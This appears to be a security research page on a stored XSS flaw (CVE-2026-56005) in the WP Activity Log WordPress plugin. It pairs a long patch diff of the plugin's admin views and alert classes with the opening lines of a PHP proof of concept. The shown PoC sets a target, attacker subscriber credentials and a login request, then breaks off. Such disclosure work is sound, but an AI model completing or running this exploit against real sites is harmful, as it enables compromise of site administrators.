-								<?php echo isset( $this->adverts[ $wsal_premium_advert ]['desc'] ) && ! empty( $this->adverts[ $wsal_premium_advert ]['desc'] ) ? esc_html( $this->adverts[ $wsal_premium_advert ]['desc'] ) : false; ?> <?php if ( isset( $this->adverts[ $wsal_premium_advert ]['desc'] ) && ! empty( $this->adverts[ $wsal_premium_advert ]['desc'] ) ) { ?>- <a href="<?php echo esc_url( $more_info ); ?>" target="_blank"><?php esc_html_e( 'Learn more', 'wp-security-audit-log' ); ?></a><?php } ?>
-							</p>
-						</div>
-						<!-- /.wsal_notice__content -->
-						<div class="wsal_notice__btns">
-							<?php
-							// Trial link arguments.
-							$trial_link = add_query_arg(
-								array(
-									'utm_source'   => 'plugin',
-									'utm_medium'   => 'banner',
-									'utm_campaign' => 'wsal',
-								),
-								'https://melapress.com/wordpress-activity-log/pricing/'
-							);
-
-							$buy_now = add_query_arg(
-								array(
-									'utm_source'   => 'plugin',
-									'utm_medium'   => 'banner',
-									'utm_campaign' => 'wsal',
-								),
-								'https://melapress.com/wordpress-activity-log/features/'
-							);
-							?>
-							<a href="<?php echo esc_url( $trial_link ); ?>" class="button button-primary wsal_notice__btn notice-cta" target="_blank"><?php esc_html_e( 'Get WP Activity Log Premium', 'wp-security-audit-log' ); ?></a>
-							<br>
-							<a href="<?php echo esc_url( $buy_now ); ?>" class="start-trial-link" style="text-transform: uppercase;" target="_blank"><?php esc_html_e( 'See plugin features', 'wp-security-audit-log' ); ?></a>
-						</div>
-						<!-- /.wsal_notice__btns -->
-					</div>
-					<!-- /.wsal_notice__wrapper -->
-				</div>
-				<?php */
-			endif;
-		}
-
-
-		// Check anonymous mode.
-		if ( 'anonymous' === WSALHelpersSettings_Helper::get_option_value( 'freemius_state', 'anonymous' ) ) { // If user manually opt-out then don't show the notice.
-			if (
-				wsal_freemius()->is_anonymous() // Anonymous mode option.
-				&& wsal_freemius()->is_not_paying() // Not paying customer.
-				&& wsal_freemius()->has_api_connectivity() // Check API connectivity.
-				&& $is_current_view
-				&& Settings_Helper::current_user_can( 'edit' ) // Have permission to edit plugin settings.
-			) {
-				if ( ! WP_Helper::is_multisite() || ( WP_Helper::is_multisite() && is_network_admin() ) ) :
-					?>
-					<div class="notice notice-success">
-						<p><strong><?php esc_html_e( 'Help WP Activity Log improve.', 'wp-security-audit-log' ); ?></strong></p>
-						<p><?php echo esc_html__( 'You can help us improve the plugin by opting in to share non-sensitive data about the plugin usage. The technical data will be shared over a secure channel. Activity log data will never be shared. When you opt-in, you also subscribe to our announcement and newsletter (you can opt-out at any time). If you would rather not opt-in, we will not collect any data.', 'wp-security-audit-log' ) . ' <a href="https://melapress.com/support/kb/non-sensitive-diagnostic-data/" target="_blank">' . esc_html__( 'Read more about what data we collect and how.', 'wp-security-audit-log' ) . '</a>'; ?></p>
-						<p>
-							<a href="javascript:;" class="button button-primary" onclick="wsal_freemius_opt_in(this)" data-opt="yes"><?php esc_html_e( 'Sure, opt-in', 'wp-security-audit-log' ); ?></a>
-							<a href="javascript:;" class="button" onclick="wsal_freemius_opt_in(this)" data-opt="no"><?php esc_html_e( 'No, thank you', 'wp-security-audit-log' ); ?></a>
-							<input type="hidden" id="wsal-freemius-opt-nonce" value="<?php echo esc_attr( wp_create_nonce( 'wsal-freemius-opt' ) ); ?>" />
-						</p>
-					</div>
-					<?php
-				endif;
-			}
-		}

 		// Display add-on available notice.
 		$screen = get_current_screen();
@@ -528,10 +411,51 @@
 				echo '<strong>' . esc_html( $item ) . ':</strong> <span style="opacity: 0.7;"><pre style="display:inline">' . esc_html( $value ) . '</pre></span></br>';
 			}
 		}
+
+		$occurrence         = (array) Occurrences_Entity::load( 'id = %d', array( (int) $get_array['occurrence'] ), $wsal_db );
+		$inspected_alert_id = (int) ( $occurrence['alert_id'] ?? 0 );
+
+		do_action( 'wsal_inspector_after_meta', $inspected_alert_id );
+
 		echo '</div>';
 		wp_die();
 	}

+	// @free:start
+	/**
+	 * Renders the free version additional inspector links for the inspected event.
+	 *
+	 * @param int $inspected_alert_id - The inspected alert ID.
+	 *
+	 * @return void
+	 *
+	 * @since 5.6.4
+	 */
+	public static function render_free_inspector_additional_links( int $inspected_alert_id ): void {
+		$notes_link_events   = array( 5000, 5001, 5002, 4007, 2051, 2046 );
+		$reports_link_events = array( 2000, 2001, 2100, 4000 );
+		$link_label          = '';
+		$link_title          = '';
+		$show_lock_icon      = false;
+
+		$inspector_link_url = 'https://melapress.com/wordpress-activity-log/pricing/?utm_source=plugin&utm_medium=wsal&utm_campaign=inspector-cta-' . $inspected_alert_id;
+
+		if ( in_array( $inspected_alert_id, $notes_link_events, true ) ) {
+			$link_label = __( 'Add note', 'wp-security-audit-log' );
+			$link_title = __( 'Add notes to activity log entries with Premium', 'wp-security-audit-log' );
+
+			$show_lock_icon = true;
+
+		} elseif ( in_array( $inspected_alert_id, $reports_link_events, true ) ) {
+			$link_label = __( 'Get scheduled reports for content and publishing activity with Premium', 'wp-security-audit-log' );
+		} else {
+			return;
+		}
+
+		echo '<div class="wsal-inspector-cta"><a href="' . esc_url( $inspector_link_url ) . '" target="_blank" rel="noopener noreferrer"' . ( '' !== $link_title ? ' title="' . esc_attr( $link_title ) . '"' : '' ) . '>' . esc_html( $link_label ) . ( $show_lock_icon ? ' <span class="wsal-custom-notifications-lock" aria-hidden="true"></span>' : '' ) . '</a></div>';
+	}
+	// @free:end
+
 	/**
 	 * Ajax callback to search.
 	 */
@@ -598,79 +522,6 @@
 	}

 	/**
-	 * Ajax callback to handle Freemius opt in/out.
-	 */
-	public function wsal_freemius_opt_in() {
-		// Die if not have access.
-		if ( ! Settings_Helper::current_user_can( 'edit' ) ) {
-			die( 'Access Denied.' );
-		}
-
-		// Get post array through filter.
-		$nonce  = sanitize_text_field( wp_unslash( $_POST['opt_nonce'] ) ); // Nonce.
-		$choice = sanitize_text_field( wp_unslash( $_POST['choice'] ) ); // Choice selected by user.
-
-		// Verify nonce.
-		if ( empty( $nonce ) || ! wp_verify_nonce( $nonce, 'wsal-freemius-opt' ) ) {
-			// Nonce verification failed.
-			echo wp_json_encode(
-				array(
-					'success' => false,
-					'message' => esc_html__( 'Nonce verification failed.', 'wp-security-audit-log' ),
-				)
-			);
-			exit();
-		}
-
-		// Check if choice is not empty.
-		if ( ! empty( $choice ) ) {
-			if ( 'yes' === $choice ) {
-				if ( ! WP_Helper::is_multisite() ) {
-					wsal_freemius()->opt_in(); // Opt in.
-				} else {
-					// Get sites.
-					$sites      = Freemius::get_sites();
-					$sites_data = array();
-
-					if ( ! empty( $sites ) ) {
-						foreach ( $sites as $site ) {
-							$sites_data[] = wsal_freemius()->get_site_info( $site );
-						}
-					}
-					wsal_freemius()->opt_in( false, false, false, false, false, false, false, false, $sites_data );
-				}
-
-				// Update Freemius state.
-				Settings_Helper::set_option_value( 'freemius_state', 'in', true );
-			} elseif ( 'no' === $choice ) {
-				if ( ! WP_Helper::is_multisite() ) {
-					wsal_freemius()->skip_connection(); // Opt out.
-				} else {
-					wsal_freemius()->skip_connection( null, true ); // Opt out for all websites.
-				}
-
-				// Update Freemius state.
-				Settings_Helper::set_option_value( 'freemius_state', 'skipped', true );
-			}
-
-			echo wp_json_encode(
-				array(
-					'success' => true,
-					'message' => esc_html__( 'Freemius opt choice selected.', 'wp-security-audit-log' ),
-				)
-			);
-		} else {
-			echo wp_json_encode(
-				array(
-					'success' => false,
-					'message' => esc_html__( 'Freemius opt choice not found.', 'wp-security-audit-log' ),
-				)
-			);
-		}
-		exit();
-	}
-
-	/**
 	 * Register shared scripts early so that extensions enqueuing on
 	 * admin_enqueue_scripts (priority 10) can safely declare them
 	 * as dependencies.
--- a/wp-security-audit-log/classes/Views/class-premium-features.php
+++ b/wp-security-audit-log/classes/Views/class-premium-features.php
@@ -115,6 +115,24 @@
 				}

 				/* Styles - START */
+				.wsal-premium-overview {
+					text-align: center;
+					margin-bottom: 40px;
+				}
+
+				.wsal-premium-overview h2 {
+					font-size: 1.375rem;
+					line-height: 1.25;
+					margin: 0 auto;
+					max-width: 728px;
+				}
+
+				.wsal-premium-overview .wsal-cta {
+					font-size: 1.125rem;
+					margin-top: 16px;
+					display: inline-block;
+				}
+
 				.wsal-features h1 {
 					color: #1A3060;
 					font-family: 'Quicksand', sans-serif;
@@ -197,7 +215,7 @@
 				/* Tablet and larger screens */
 				@media (min-width: 868px) {
 					.wsal-features h1 {
-						font-size: 3.4rem; /* Larger font size for tablets and above */
+						font-size: 2.8rem; /* Larger font size for tablets and above */
 					}

 					.wsal-feature-list {
@@ -221,116 +239,68 @@
 				/* Styles - END */
 			</style>
 			<section class="wsal-features">
-				<h1><strong><?php echo esc_html__( 'Premium features', 'wp-security-audit-log' ); ?></strong></h1>
+				<h1><strong><?php echo esc_html__( 'Unlock advanced activity log capabilities', 'wp-security-audit-log' ); ?></strong></h1>
+				<div class="wsal-premium-overview">
+					<h2><?php echo esc_html__( 'Get real-time alerts, advanced reporting, user session management, integrations, and more with WP Activity Log Premium.', 'wp-security-audit-log' ); ?></h2>
+					<p class="wsal-cta"><a href="<?php echo esc_url( 'https://melapress.com/wordpress-activity-log/pricing/?utm_source=plugin&utm_medium=wsal&utm_campaign=premium-features-top' ); ?>" target="_blank" class="wsal-cta-link"><?php echo esc_html__( 'View Pricing', 'wp-security-audit-log' ); ?></a></p>
+				</div>
 				<ul class="wsal-feature-list">
 					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wsal-instant-alert.svg" alt="instant alerts">
-						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Receive instant SMS & email alerts', 'wp-security-audit-log' ); ?></h2>
-							<div>
-								<p><?php echo esc_html__( 'Know what is happening on your websites without having to login! Get instantly alerted of any user activities or site changes via SMS messages and emails. You can start right away with the built-in notifications or even create your own notification triggers.', 'wp-security-audit-log' ); ?></p>
-							</div>
-						</div>
-					</li>
-					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wsal-user-sessions.svg" alt="WordPress activity log reports">
-						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Generate activity log reports', 'wp-security-audit-log' ); ?></h2>
-							<div>
-								<p><?php echo esc_html__( 'Generate user and system reports from the activity log including the update log. Reports are fully configurable and include White Labelling options. You can also schedule daily, weekly, monthly, or quarterly reports to be sent automatically to your inbox.', 'wp-security-audit-log' ); ?></p>
-							</div>
-						</div>
-					</li>
-					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wp-activity-log-user-sessions.svg" alt="WP Activity Log user sessions">
-						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Manage users sessions in real-time', 'wp-security-audit-log' ); ?></h2>
-							<div>
-								<p><?php echo esc_html__( 'Use the real-time user activity monitor to remotely terminate sessions, block simultaneous same-user sessions, and automatically terminate idle sessions; with email notifications so that you can truly manage your WordPress from anywhere.', 'wp-security-audit-log' ); ?></p>
-							</div>
-						</div>
-					</li>
-					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wsal-easy-search.svg" alt="easy activity log search">
-						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Easily track down specific activity', 'wp-security-audit-log' ); ?></h2>
-							<div>
-								<p><?php echo esc_html__( 'Use the extensive built-in filters to fine tune the log viewer search results and easily track down specific WordPress system and user changes. Filter configurations can also be saved for future use to find what you are looking for within seconds.', 'wp-security-audit-log' ); ?></p>
-							</div>
-						</div>
-					</li>
-					<li><img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/database.svg" alt="activity log database">
-						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Store the logs in an external database', 'wp-security-audit-log' ); ?></h2>
-							<div>
-								<p><?php echo esc_html__( 'Improve the security posture of your website and store the activity log in an external database. By doing so you also safeguard the integrity of the logs in an unfortunate case of a website hack.', 'wp-security-audit-log' ); ?></p>
-							</div>
-						</div>
-					</li>
-					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/manage-the-logs.svg" alt="manage logs activity">
-						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Archive old activity log data', 'wp-security-audit-log' ); ?></h2>
-							<div>
-								<p><?php echo esc_html__( 'Configure the plugin to automatically archive log data that is older than a specific period to another database. Keep the log organized, easier to search, compact, and blazing fast.', 'wp-security-audit-log' ); ?></p>
-							</div>
-						</div>
-					</li>
-					<li><img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/integration-with-log-managment.svg" alt="integration with log management">
+						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wsal-instant-alert.svg" alt="<?php echo esc_attr__( 'instant alerts', 'wp-security-audit-log' ); ?>">
 						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Logs & business systems integration', 'wp-security-audit-log' ); ?></h2>
+							<h2><?php echo esc_html__( 'Get instantly alerted to critical activity', 'wp-security-audit-log' ); ?></h2>
 							<div>
-								<p><?php echo esc_html__( 'Mirror the activity log in real time to your central logs management system so you do not have to log in to the websites and see what is happening from one central place. WP Activity Log supports AWS CloudWatch, Loggly, Slack, and others.', 'wp-security-audit-log' ); ?></p>
+								<p><?php echo esc_html__( 'Get instantly notified via email, SMS, or Slack when important user activity or website changes happen, without needing to log in to your website.', 'wp-security-audit-log' ); ?></p>
 							</div>
 						</div>
 					</li>
 					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/mirror-the-log-files.svg" alt="mirror the log files">
+						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wsal-user-sessions.svg" alt="<?php echo esc_attr__( 'WordPress activity log reports', 'wp-security-audit-log' ); ?>">
 						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Mirror the activity log to log files', 'wp-security-audit-log' ); ?></h2>
+							<h2><?php echo esc_html__( 'Stay informed with automated activity reports', 'wp-security-audit-log' ); ?></h2>
 							<div>
-								<p><?php echo esc_html__( 'Mirror the activity logs to a log file as a backup, while making it easier to import the activity log to your custom logs management system. Configure the plugin to write the activity log to a log file so the logs can be read and parsed by your system.', 'wp-security-audit-log' ); ?></p>
+								<p><?php echo esc_html__( 'Generate configurable activity log and user reports, schedule automatic email delivery, and create white-labelled reports for clients and teams.', 'wp-security-audit-log' ); ?></p>
 							</div>
 						</div>
 					</li>
 					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wsal-send-activity-log.svg" alt="wsal send activity log">
+						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wp-activity-log-user-sessions.svg" alt="<?php echo esc_attr__( 'WP Activity Log user sessions', 'wp-security-audit-log' ); ?>">
 						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Send activity logs directly to third party systems', 'wp-security-audit-log' ); ?></h2>
+							<h2><?php echo esc_html__( 'Prevent account sharing & manage user sessions', 'wp-security-audit-log' ); ?></h2>
 							<div>
-								<p><?php echo esc_html__( 'When you send the activity log to a log file or a third party logs management system you can configure the plugin to not write any activity log data to the database, avoiding redundant data.', 'wp-security-audit-log' ); ?></p>
+								<p><?php echo esc_html__( 'See who is logged in to your website in real time, remotely terminate sessions, prevent simultaneous logins, and automatically log out idle users.', 'wp-security-audit-log' ); ?></p>
 							</div>
 						</div>
 					</li>
 					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/plugin-setting-configuration.svg" alt="plugin setting configuration">
+						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wsal-easy-search.svg" alt="<?php echo esc_attr__( 'easy activity log search', 'wp-security-audit-log' ); ?>">
 						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Export & import plugin settings configuration', 'wp-security-audit-log' ); ?></h2>
+							<h2><?php echo esc_html__( 'Troubleshoot issues faster', 'wp-security-audit-log' ); ?></h2>
 							<div>
-								<p><?php echo esc_html__( 'Export the plugin settings configuration to keep a backup, or to import the same plugin configuration on other websites, allowing you to have a base configuration and easily propagate it to other websites.', 'wp-security-audit-log' ); ?></p>
+								<p><?php echo esc_html__( 'Quickly track down specific activity using advanced filters, saved searches, and detailed activity insights.', 'wp-security-audit-log' ); ?></p>
 							</div>
 						</div>
 					</li>
 					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/wsal-specific-activity.svg" alt="wsal specific activity">
+						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/database.svg" alt="<?php echo esc_attr__( 'activity log database', 'wp-security-audit-log' ); ?>">
 						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Delete specific activity log data', 'wp-security-audit-log' ); ?></h2>
+							<h2><?php echo esc_html__( 'Store and manage activity logs at scale', 'wp-security-audit-log' ); ?></h2>
 							<div>
-								<p><?php echo esc_html__( 'Need to delete data for a specific user, IP address, or another object? Use the activity log data manager to delete specific data that you do not want in your log.', 'wp-security-audit-log' ); ?></p>
+								<p><?php echo esc_html__( 'Store logs in external databases, archive older data automatically, and integrate with services like AWS CloudWatch, Slack, and Loggly.', 'wp-security-audit-log' ); ?></p>
 							</div>
 						</div>
 					</li>
 					<li>
-						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/premium-support.svg" alt="premium support">
+						<img width="128" height="128" src="<?php echo esc_url( WSAL_BASE_URL ); ?>classes/Views/assets/images/premium-support.svg" alt="<?php echo esc_attr__( 'premium support', 'wp-security-audit-log' ); ?>">
 						<div class="wsal-feature-content">
-							<h2><?php echo esc_html__( 'Premium support', 'wp-security-audit-log' ); ?></h2>
+							<h2><?php echo esc_html__( 'Get fast, professional support when you need it', 'wp-security-audit-log' ); ?></h2>
 							<div>
-								<p><?php echo esc_html__( 'Get professional email support within just a few hours from people who care. Our knowledgeable support team is proud of our 8-hour average response time.', 'wp-security-audit-log' ); ?></p>
+								<p><?php echo esc_html__( 'Get fast, professional support from a real human with an average response time of under 8 hours.', 'wp-security-audit-log' ); ?></p>
 							</div>
 						</div>
 					</li>
 				</ul>
-				<p class="wsal-cta"><a href="https://melapress.com/wordpress-activity-log/pricing/?utm_source=plugin&utm_medium=wsal&utm_campaign=premium-features-page-cta" target="_blank" class="wsal-cta-link">Get WP Activity Log Premium</a></p>
+				<p class="wsal-cta"><a href="<?php echo esc_url( 'https://melapress.com/wordpress-activity-log/pricing/?utm_source=plugin&utm_medium=wsal&utm_campaign=premium-features-page-cta-bottom' ); ?>" target="_blank" class="wsal-cta-link"><?php echo esc_html__( 'Get WP Activity Log Premium', 'wp-security-audit-log' ); ?></a></p>
 			</section>
 			<?php
 		}
--- a/wp-security-audit-log/classes/Views/class-setup-wizard.php
+++ b/wp-security-audit-log/classes/Views/class-setup-wizard.php
@@ -806,13 +806,13 @@
 			<p class="description">
 				<em>
 					<?php
-					/* @free:start */
+					// @free:start

 					// Change the help text if premium version of the plugin is active.
 					$step_help = __( 'Upgrade to <a href="https://melapress.com/wordpress-activity-log/features/?utm_source=plugin&utm_medium=wsal&utm_campaign=install-wizard-link-2" rel="nofollow"  target="_blank">WP Activity Log Premium</a> to customize your activity log summary. Include additional details and choose exactly what to track', 'wp-security-audit-log' );

 					echo wp_kses( $step_help, Plugin_Settings_Helper::get_allowed_html_tags() );
-					/* @free:end */
+					// @free:end

 					?>
 				</em>
@@ -898,7 +898,7 @@
 			<p class="description">
 				<em>
 					<?php
-					/* @free:start */
+					// @free:start

 					/*
 					// Change the help text if premium version of the plugin is active.
@@ -906,7 +906,7 @@

 					echo wp_kses( $step_help, Plugin_Settings_Helper::get_allowed_html_tags() );
 					*/
-					/* @free:end */
+					// @free:end

 					?>
 				</em>
@@ -951,10 +951,31 @@
 		 */
 		private static function wsal_step_finish() {
 			?>
-			<h4>
+			<h2>
 				<?php esc_html_e( 'You’re all set!', 'wp-security-audit-log' ); ?>
-			</h4>
-			<p><?php esc_html_e( 'WP Activity Log is now ready and it has already started recording changes and user actions on your WordPress site. To help you make the most of the plugin, check out these helpful resources:', 'wp-security-audit-log' ); ?></p>
+			</h2>
+
+			<?php
+				// @free:start
+			?>
+			<div class="wsal-premium-callout">
+				<span class="dashicons dashicons-info-outline wsal-premium-callout-icon" aria-hidden="true"></span>
+				<div class="wsal-premium-callout-content">
+					<h3 class="wsal-premium-callout-title">
+						<?php esc_html_e( 'Monitor your website more efficiently with Premium', 'wp-security-audit-log' ); ?>
+					</h3>
+					<p class="wsal-premium-callout-description">
+						<?php esc_html_e( 'Save time with automated reports, stay informed with instant email notifications, and find important activity faster with advanced search and filtering.', 'wp-security-audit-log' ); ?> <a href="<?php echo esc_url( 'https://melapress.com/wordpress-activity-log/?utm_source=plugin&utm_medium=wsal&utm_campaign=install-wizard-upgrade' ); ?>" rel="noopener noreferrer" target="_blank"><?php esc_html_e( 'See what’s included in Premium', 'wp-security-audit-log' ); ?></a>.
+					</p>
+				</div>
+			</div>
+			<?php
+				// @free:end
+			?>
+
+			<p><?php esc_html_e( 'WP Activity Log is now configured and has already started recording changes and user activity on your WordPress website.', 'wp-security-audit-log' ); ?></p>
+
+			<p><?php esc_html_e( 'To help you get the most out of the plugin, here are some useful resources:', 'wp-security-audit-log' ); ?></p>

 			<ul>
 				<li>
@@ -963,13 +984,13 @@
 					</a>
 				</li>
 				<li>
-					<a href="https://melapress.com/support/kb/wp-activity-log-event-ids/?utm_source=plugin&utm_medium=wsal&utm_campaign=install-wizard-link-4" rel="noopener noreferrer" target="_blank">
-						<?php esc_html_e( 'What are events and event IDs', 'wp-security-audit-log' ); ?>
+					<a href="https://melapress.com/support/kb/wp-activity-log-list-event-ids/?utm_source=plugin&utm_medium=wsal&utm_campaign=install-wizard-link-5" rel="noopener noreferrer" target="_blank">
+						<?php esc_html_e( 'Complete list of event IDs', 'wp-security-audit-log' ); ?>
 					</a>
 				</li>
 				<li>
-					<a href="https://melapress.com/support/kb/wp-activity-log-list-event-ids/?utm_source=plugin&utm_medium=wsal&utm_campaign=install-wizard-link-5" rel="noopener noreferrer" target="_blank">
-						<?php esc_html_e( 'The complete list of all the event IDs', 'wp-security-audit-log' ); ?>
+					<a href="https://melapress.com/support/kb/wp-activity-log-event-ids/?utm_source=plugin&utm_medium=wsal&utm_campaign=install-wizard-link-4" rel="noopener noreferrer" target="_blank">
+						<?php esc_html_e( 'Understanding events and event IDs', 'wp-security-audit-log' ); ?>
 					</a>
 				</li>
 				<li>
@@ -979,18 +1000,11 @@
 				</li>
 				<li>
 					<a href="https://melapress.com/wordpress-activity-log/features/?utm_source=plugin&utm_medium=wsal&utm_campaign=install-wizard-link-7" rel="noopener noreferrer" target="_blank">
-						<?php esc_html_e( 'WP Activity Log plugin features', 'wp-security-audit-log' ); ?>
+						<?php esc_html_e( 'WP Activity Log features and documentation', 'wp-security-audit-log' ); ?>
 					</a>
 				</li>
 			</ul>

-			<?php
-			// Link to contact form.
-			$help_page = 'https://melapress.com/contact/?utm_source=plugin&utm_medium=wsal&utm_campaign=install-wizard-link-8';
-			?>
-
-			<p><?php echo wp_kses( __( 'We are confident WP Activity Log will meet your activity monitoring needs. If you have any questions, feature suggestions, or feedback, feel free to ', 'wp-security-audit-log' ), Plugin_Settings_Helper::get_allowed_html_tags() ); ?>  <a href="<?php echo esc_url( $help_page ); ?>" rel="noopener noreferrer" target="_blank"><?php esc_html_e( 'contact us anytime!', 'wp-security-audit-log' ); ?></a></p>
-
 			<form method="post" class="wsal-setup-form">
 				<?php wp_nonce_field( 'wsal-step-finish' ); ?>
 				<div class="wsal-setup-actions">
@@ -998,7 +1012,7 @@
 						type="submit"
 						name="save_step"
 						value="<?php esc_attr_e( 'Finish', 'wp-security-audit-log' ); ?>">
-						<?php esc_html_e( 'Finish', 'wp-security-audit-log' ); ?>
+						<?php esc_html_e( 'Open Activity Log', 'wp-security-audit-log' ); ?>
 					</button>
 				</div>
 			</form>
--- a/wp-security-audit-log/classes/WPSensors/Alerts/class-ai-wp-plugin-alerts.php
+++ b/wp-security-audit-log/classes/WPSensors/Alerts/class-ai-wp-plugin-alerts.php
@@ -0,0 +1,92 @@
+<?php
+/**
+ * Custom Alerts for the WordPress AI plugin.
+ *
+ * Class file for alert manager.
+ *
+ * @since 5.6.4
+ *
+ * @package Wsal
+ * @subpackage Sensors
+ */
+
+declare(strict_types=1);
+
+namespace WSALWP_SensorsAlerts;
+
+use WSALMainWPMainWP_Addon;
+use WSALWP_SensorsHelpersAI_WP_Plugin_Helper;
+
+// Exit if accessed directly.
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+if ( ! class_exists( 'WSALWP_SensorsAlertsAI_WP_Plugin_Alerts' ) ) {
+	/**
+	 * Custom alerts for the WordPress AI plugin.
+	 *
+	 * @since 5.6.4
+	 */
+	class AI_WP_Plugin_Alerts {
+		/**
+		 * Returns the structure of the alerts for this plugin extension.
+		 *
+		 * @return array $alerts - Alerts array.
+		 *
+		 * @since 5.6.4
+		 */
+		public static function get_custom_alerts(): array {
+			if ( ( method_exists( AI_WP_Plugin_Helper::class, 'load_alerts_for_sensor' ) && AI_WP_Plugin_Helper::load_alerts_for_sensor() ) || MainWP_Addon::check_mainwp_plugin_active() ) {
+				/**
+				 * For the moment, we're adding this one in the 'WordPress & System' category.
+				 * We may need to create a dedicated category when we get more events from this plugin.
+				 */
+				return array(
+					esc_html__( 'WordPress & System', 'wp-security-audit-log' ) => array(
+						esc_html__( 'System', 'wp-security-audit-log' ) => self::get_alerts_array(),
+					),
+				);
+			}
+
+			return array();
+		}
+
+		/**
+		 * Returns array with all the events attached to the sensor.
+		 *
+		 * @return array $alerts - Alerts array.
+		 *
+		 * @since 5.6.4
+		 */
+		public static function get_alerts_array(): array {
+			return array(
+				6083 => array(
+					6083,
+					WSAL_HIGH,
+					esc_html__( 'AI master switch enabled / disabled', 'wp-security-audit-log' ),
+					/* translators: %EventVerb%: Enabled or Disabled. */
+					esc_html__( '%EventVerb% the AI master switch in the AI plugin settings.', 'wp-security-audit-log' ),
+					array(),
+					array(),
+					'system',
+					'enabled',
+				),
+				6084 => array(
+					6084,
+					WSAL_MEDIUM,
+					esc_html__( 'AI plugin feature enabled / disabled', 'wp-security-audit-log' ),
+
+					/* translators: %EventVerb%: Enabled or Disabled; %FeatureName%: AI plugin feature name. */
+					esc_html__( '%EventVerb% the %FeatureName% feature in the AI plugin settings.', 'wp-security-audit-log' ), // phpcs:ignore WordPress.WP.I18n.UnorderedPlaceholdersText
+					array(
+						esc_html__( 'Feature slug', 'wp-security-audit-log' ) => '%FeatureSlug%',
+					),
+					array(),
+					'system',
+					'enabled',
+				),
+			);
+		}
+	}
+}
--- a/wp-security-audit-log/classes/WPSensors/Alerts/class-learndash-custom-alerts.php
+++ b/wp-security-audit-log/classes/WPSensors/Alerts/class-learndash-custom-alerts.php
@@ -81,6 +81,40 @@
 			return array_merge( $alerts, self::get_default_disabled_alerts() );
 		}

+		// @free:start
+		/**
+		 * Returns LearnDash free event IDs that have additional related events available only in WSAL Premium.
+		 *
+		 * Used to render an upgrade CTA at the bottom of the affected events in the log viewer.
+		 *
+		 * @return int[] $event_ids - Free event IDs that should display the premium CTA.
+		 *
+		 * @since 5.6.4
+		 */
+		public static function get_free_version_events(): array {
+			return array( 11000, 11001, 11004, 11021, 11200, 11201, 11207, 11216, 11301, 11400, 11401, 11405, 11500, 11501, 11504 );
+		}
+
+		/**
+		 * Add links to the events that have related events available only in premium.
+		 *
+		 * @param array $links - Existing event_id => label map.
+		 *
+		 * @return array $links - Merged event_id => label map.
+		 *
+		 * @since 5.6.4
+		 */
+		public static function add_link_to_fr

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-56005 - WP Activity Log <= 5.6.3.1 - Authenticated (Subscriber+) Stored XSS

$target_url = 'http://example.com';  // Change this to the target WordPress site
$username   = 'attacker-subscriber';
$password   = 'password';

// Step 1: Authenticate with subscriber-level account
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
